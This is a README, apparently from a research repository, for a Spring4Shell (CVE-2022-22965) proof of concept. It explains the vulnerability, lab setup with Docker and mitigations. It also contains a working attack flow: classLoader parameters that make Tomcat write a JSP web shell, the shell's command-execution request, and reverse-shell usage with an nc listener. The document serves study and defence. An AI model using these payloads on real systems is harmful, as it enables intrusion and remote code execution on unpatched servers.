Share
## https://sploitus.com/exploit?id=93DA15CB-B32C-5D7A-BFD9-1D1B9635B73E
# PoC โ€” CVE-2022-22965 (Spring4Shell)

> **Disclaimer:** This repository is intended for **educational and research purposes only**.
> All exploit scripts must be used exclusively against systems you own or have explicit written
> permission to test. The author is not responsible for any misuse or damage caused by this material.

Study and proof-of-concept for CVE-2022-22965, a critical Remote Code Execution (RCE) vulnerability
in Spring Framework, publicly disclosed in April 2022.

---

## Vulnerability Overview

**Spring4Shell** affects Spring MVC and Spring WebFlux applications when all of the following
conditions are met:

| Condition | Value |
|---|---|
| JDK version | 9 or higher |
| Application server | Apache Tomcat |
| Packaging | WAR (not executable JAR) |
| Spring Framework | 
```

This path reaches Tomcat's `AccessLogValve`, whose logging configuration can be manipulated at
runtime. By modifying properties such as `pattern`, `directory`, `prefix`, and `suffix`, the
attacker redirects Tomcat's access log to write a file with a `.jsp` extension containing
arbitrary JSP code โ€” effectively planting a **web shell** on the server.

### Attack flow

```
1. POST /vulnerable
   class.module.classLoader.resources.context.parent.pipeline.first.pattern=
   class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
   class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
   class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell
   class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

2. Tomcat writes the access log to webapps/ROOT/shell.jsp with the injected payload

3. GET /shell.jsp?cmd=id  โ†’  RCE
```

---

## Repository Structure

```
.
โ”œโ”€โ”€ exploits/
โ”‚   โ”œโ”€โ”€ exploit1.py   # POST-based web shell with password protection
โ”‚   โ”œโ”€โ”€ exploit2.py   # POST-based web shell with reset capability
โ”‚   โ”œโ”€โ”€ exploit3.py   # GET-based variant (simplified)
โ”‚   โ”œโ”€โ”€ exploit4.py   # Reverse TCP shell (GET-based)
โ”‚   โ””โ”€โ”€ exploit4b.py  # Reverse TCP shell (POST-based)
โ””โ”€โ”€ springmvc5-helloworld-example/
    โ”œโ”€โ”€ Dockerfile    # Uses pre-built tomcat:9.0.60 image
    โ”œโ”€โ”€ Dockerfile2   # Builds from openjdk:11 + downloads Tomcat
    โ”œโ”€โ”€ pom.xml       # Maven project โ€” Spring MVC 5.3.17 (vulnerable)
    โ””โ”€โ”€ src/          # Vulnerable Spring MVC application source
```

---

## Exploit Variants

| Script | Method | Payload | Notes |
|---|---|---|---|
| `exploit1.py` | POST | Web shell (password-protected) | Single request |
| `exploit2.py` | POST | Web shell | Resets log config before/after exploit |
| `exploit3.py` | GET  | Web shell (no password) | Parameters via query string |
| `exploit4.py` | GET  | Reverse TCP shell | msfvenom-based JSP payload |
| `exploit4b.py`| POST | Reverse TCP shell | Same payload as exploit4, POST variant |

### Usage example

```bash
# Web shell
python3 exploits/exploit1.py http://target:8080/vulnerable

# Reverse shell (start listener first: nc -lvnp 4444)
python3 exploits/exploit4.py --url http://target:8080/vulnerable --lhost  --lport 4444
```

---

## Lab Setup

### Prerequisites

- Java 11+
- Maven (`sudo apt install maven` or `sudo dnf install maven`)
- Docker (optional, recommended)

### Build

```bash
cd springmvc5-helloworld-example
mvn clean package
```

### Run with Docker

```bash
# Option 1 โ€” pre-built Tomcat image
docker build -t spring4shell .
docker run -p 8082:8080 spring4shell

# Option 2 โ€” build from openjdk + download Tomcat
docker build -t spring4shell -f Dockerfile2 .
docker run -p 8082:8080 spring4shell
```

The application is then available at `http://localhost:8082/vulnerable`.

---

## Mitigation

- **Upgrade Spring Framework** to 5.3.18+ or 5.2.20+
- **Upgrade Spring Boot** to 2.6.6+ or 2.5.12+
- If upgrading is not immediately possible:
  - Downgrade to JDK 8
  - Use `WebDataBinder.setDisallowedFields()` to block `classLoader` binding
  - Deploy a WAF rule blocking parameters containing `class.`, `Class.`, `module.`, or `classLoader`

---

## Credits

Original research and exploit code by [@march0n](https://github.com/march0n).
This repository is a personal study of the vulnerability for learning purposes, with additional
documentation and analysis.

---

## References

- [CVE-2010-1622 โ€” original Spring ClassLoader exploit (2010)](http://blog.o0o.nu/2010/06/cve-2010-1622.html)
- [Initial Chinese disclosure (Weixin)](https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw)
- [Microsoft Security Blog โ€” SpringShell guidance](https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/)
- [LunaSec โ€” Spring RCE vulnerabilities analysis](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)
- [Palo Alto Unit 42 โ€” CVE-2022-22965 deep dive](https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/)